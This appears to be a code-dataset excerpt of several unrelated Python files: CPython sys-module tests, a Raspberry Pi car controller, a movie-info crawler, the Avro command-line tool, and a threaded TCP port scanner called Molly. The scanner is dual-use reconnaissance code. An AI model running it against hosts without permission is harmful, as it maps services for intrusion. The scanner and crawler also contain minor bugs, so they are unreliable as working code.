self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip)
self.setup_udp_server()
@event_callback("host_ip")
def _callback_host_ip(self, key, value, timestamp):
"""
Callback for request for host IP Addr
"""
self.send_kv("host_ip", self.SERVER_IP)
@event_callback("host_port")
def _callback_host_port(self, key, value, timestamp):
"""
Callback for request for host port
"""
self.send_kv("host_port", self.SERVER_PORT)
def teardown(self):
if self.server:
self.server.shutdown()
self.server_thread.join()
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
try:
import _llvm
except ImportError:
WITH_LLVM = False
else:
WITH_LLVM = True
del _llvm
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(hasattr(sys.flags, "jit_control"))
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
if hasattr(sys, "setbailerror"):
def test_bailerror(self):
# sys.setbailerror() is used to raise an exception when native code
# bails to the interpreter. This is useful for testing native code
# generation/execution. configuring with --with-llvm is required
# to get sys.{set,get}bailerror().
tracer = sys.gettrace()
bail = sys.getbailerror()
def foo():
sys.settrace(lambda *args: None)
def bar():
sys.setbailerror(True)
foo()
return 7
bar.__code__.co_optimization = 2
bar.__code__.__use_llvm__ = True
def run_test():
try:
bar()
except RuntimeError:
pass
else:
self.fail("Failed to raise RuntimeError")
finally:
sys.settrace(tracer)
sys.setbailerror(bail)
# Force use of the interpreter; otherwise we can't catch the
# RuntimeError if run with -j always (line tracing triggers on the
# except, raising another RuntimeError).
run_test.__code__.__use_llvm__ = False
run_test()
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
if WITH_LLVM:
check(get_cell().func_code, size(h + '4i8Pi6Pc2il2P'))
else:
check(get_cell().func_code, size(h + '4i8Pi3P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
dict_llvm_suffix = ''
if WITH_LLVM:
# The last two members of the dict struct are really Py_ssize_t
# values, but struct.calcsize doesn't have a Py_ssize_t character
# code. In order to make this work on 32-bit and 64-bit platforms,
# we assume that sizeof(void*) == sizeof(Py_ssize_t), which is
# generally true, and put '2P' at the end.
dict_llvm_suffix = 'P2P'
check({}, size(h + '3P2P' + 8*'P2P' + dict_llvm_suffix))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P' + dict_llvm_suffix) + 16*size('P2P'))
del dict_llvm_suffix
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3Pi'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
if WITH_LLVM:
check(x, size(vh + '12P4i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
else:
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', size(vh + 'lic'))
check('abc', size(vh + 'lic') + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PIP') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
keyboardRunCar.py
|
import time
import RPi.GPIO as GPIO
import sys
from pynput import keyboard
import csv
##from termios import tcflush, TCIOFLUSH, TCIFLUSH
from multiprocessing import Process
from datetime import datetime
GPIO.cleanup()
Forward = 17
Backward = 27
Left = 23
Right = 24
sleeptime = 0.25
speed = 0.5
mode=GPIO.getmode()
GPIO.setmode(GPIO.BCM)
GPIO.setup(Forward, GPIO.OUT)
GPIO.setup(Backward, GPIO.OUT)
GPIO.setup(Left, GPIO.OUT)
GPIO.setup(Right, GPIO.OUT)
def forward(x):
GPIO.output(Forward, GPIO.HIGH)
print("Moving Forward")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Forward, GPIO.LOW)
def left(x):
GPIO.output(Left, GPIO.HIGH)
print("Moving Left")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Left, GPIO.LOW)
def right(x):
GPIO.output(Right, GPIO.HIGH)
print("Moving Right")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Right, GPIO.LOW)
def reverse(x):
GPIO.output(Backward, GPIO.HIGH)
print("Moving Backward")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Backward, GPIO.LOW)
'''
def runInParallel(*fns):
proc = []
for fn in fns:
global p
p = Process(target=fn, args=(speed,))
p.start()
proc.append(p)
#for p in proc:
# p.join()
while not p.empty():
p.get()
'''
def on_press(key):
try:
with open("controls.csv","a") as filename:
fieldnames = ['images','controls']
writer = csv.DictWriter(filename, fieldnames=fieldnames)
if (key.char == 's'):
print("speed")
reverse(sleeptime)
elif(key.char == 'w'):
forward(sleeptime)
elif(key.char == 'a'):
left(sleeptime)
elif(key.char == 'd'):
right(sleeptime)
elif(key.char == 'q'):
'''runInParallel(forward,left)
p.terminate()'''
forward(sleeptime)
left(sleeptime+0.10)
'''p1 = Process(target=forward, args=(speed,))
p1.start()
p2 = Process(target=left, args=(speed,))
p2.start()
#p1.join()
#p2.join()
p1.get()
p2.get()
#p1.terminate()'''
elif(key.char == 'e'):
forward(sleeptime)
right(sleeptime+0.10)
timestamp = datetime.now()
writer.writerows([{'images': str(timestamp), 'controls': key.char}])
except AttributeError: \
print('special key {0} pressed'.format(
key))
def on_release(key):
if (key == keyboard.Key.esc):
return False
if __name__ =='__main__':
try:
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
finally:
print("closed")
GPIO.cleanup()
|
MovieInfo.py
|
#coding: utf-8
import threading
from startThreads import ThreadMain
from Config import maxThread
from Downloader import DownloadMoviesInfo
def moviesInfo(URLS):
threads = []
# 多线程,爬取电影信息
while threads or URLS:
for thread in threads:
if not thread.is_alive():
threads.remove(thread)
while len(threads) < maxThread and URLS:
url = URLS.pop()
thread = threading.Thread(target= DownloadMoviesInfo, args= (url, ))
thread.start()
thread.join()
threads.append(thread)
if __name__ == "__main__":
moviesInfo(["http://www.gewara.com/movie/323882374", ])
|
tool.py
|
#!/usr/bin/env python3
# -*- mode: python -*-
# -*- coding: utf-8 -*-
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import http.server
import os.path
import sys
import threading
import urllib.parse
import warnings
import avro.datafile
import avro.io
import avro.ipc
import avro.protocol
class GenericResponder(avro.ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = open(proto, 'rb').read()
avro.ipc.Responder.__init__(self, avro.protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print("Message: %s Datum: %s" % (message.name, self.datum), file=sys.stderr)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = avro.ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = avro.ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urllib.parse.urlparse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = http.server.HTTPServer(server_addr, GenericHandler)
print("Port: %s" % server.server_port)
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urllib.parse.urlparse(uri)
client = avro.ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = open(proto, 'rb').read()
requestor = avro.ipc.Requestor(avro.protocol.parse(proto_json), client)
print(requestor.request(msg, datum))
##
# TODO: Replace this with fileinput()
def file_or_stdin(f):
return sys.stdin if f == '-' else open(f, 'rb')
def main(args=sys.argv):
if len(args) == 1:
print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0])
return 1
if args[1] == "dump":
if len(args) != 3:
print("Usage: %s dump input_file" % args[0])
return 1
for d in avro.datafile.DataFileReader(file_or_stdin(args[2]), avro.io.DatumReader()):
print(repr(d))
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = avro.datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = avro.datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn("Invoking avro/tool.py directly is likely to lead to a name collision "
"with the python io module. Try doing `python -m avro.tool` instead.")
sys.exit(main(sys.argv))
|
molly.py
|
from queue import Queue
from threading import Thread, Event
import click
import os
import time
import sys
import socket
from .utils import is_ip_v4
from .constants import FIRST_1000_PORTS, ALL_PORTS, TOP_20_PORTS, VERSION
class Molly():
def __init__(self, target, mode, workers):
self.hostname = target
self.mode = mode
self.target = self._parse_target(target)
self.queue = Queue()
self.open_ports = []
self.closed_ports = []
self.max_workers = workers
self.exit_signal = Event()
self.start_time = None
self.end_time = None
def get_ports_to_scan(self):
if self.mode == 'basic':
self._add_ports_to_queue(FIRST_1000_PORTS)
elif self.mode == 'full':
self._add_ports_to_queue(ALL_PORTS)
elif self.mode == 'common':
self._add_ports_to_queue(TOP_20_PORTS)
elif self.mode == 'custom':
ports = self._get_custom_port_range()
self._add_ports_to_queue(ports)
else:
raise ValueError(f'Unexpected value for --mode option: {self.mode}')
def _scan(self):
while not self.queue.empty() and not self.exit_signal.is_set():
port = self.queue.get()
connection_descriptor = self._connect(port)
if connection_descriptor == 0:
self.open_ports.append(port)
click.echo(f'Port {port} is open')
else:
self.closed_ports.append(port)
def run_scan(self):
click.echo(f'Running scan (Mode: {self.mode}) ...')
self.start_time = time.time()
threads = []
for _ in range(self.max_workers):
t = Thread(target=self._scan)
threads.append(t)
t.start()
try:
pass
except KeyboardInterrupt:
self.exit_signal.set()
click.echo('\nExiting ...')
self._send_report()
sys.exit(1)
for t in threads:
t.join()
self._send_report()
def _add_ports_to_queue(self, ports):
if isinstance(ports, int):
for port in range(1, ports):
self.queue.put(port)
elif isinstance(ports, list):
for port in ports:
self.queue.put(port)
elif isinstance(ports, tuple):
start = ports[0]
end = ports[1]
for port in range(start, end):
self.queue.put(port)
def _parse_target(self, target):
if is_ip_v4(target):
return target
else:
try:
_target = socket.gethostbyname(target)
except socket.gaierror:
sys.exit(f'[Error] No Address Associated With Hostname. ({target})')
else:
return _target
def _connect(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(.5)
result = s.connect_ex((self.target, port))
return result
def _send_report(self):
self.end_time = time.time()
self.open_ports = list(map(str, self.open_ports))
click.echo(f'\nMolly Scan Report for {self.target} ({self.hostname})')
click.echo('-' * 40)
click.echo(f'Found {len(self.closed_ports)} closed ports.\n')
click.echo(f'Found {len(self.open_ports)} open ports: \n')
if len(self.open_ports) != 0:
click.echo(' \n'.join(self.open_ports))
click.echo(f'\nMolly done: 1 IP scanned (1 Host Up) {self.total_ports_scanned} ports scanned in {self._compute_scan_time()} seconds.')
def _compute_scan_time(self):
elapsed_time = self.end_time - self.start_time
return f'{elapsed_time:.2f}'
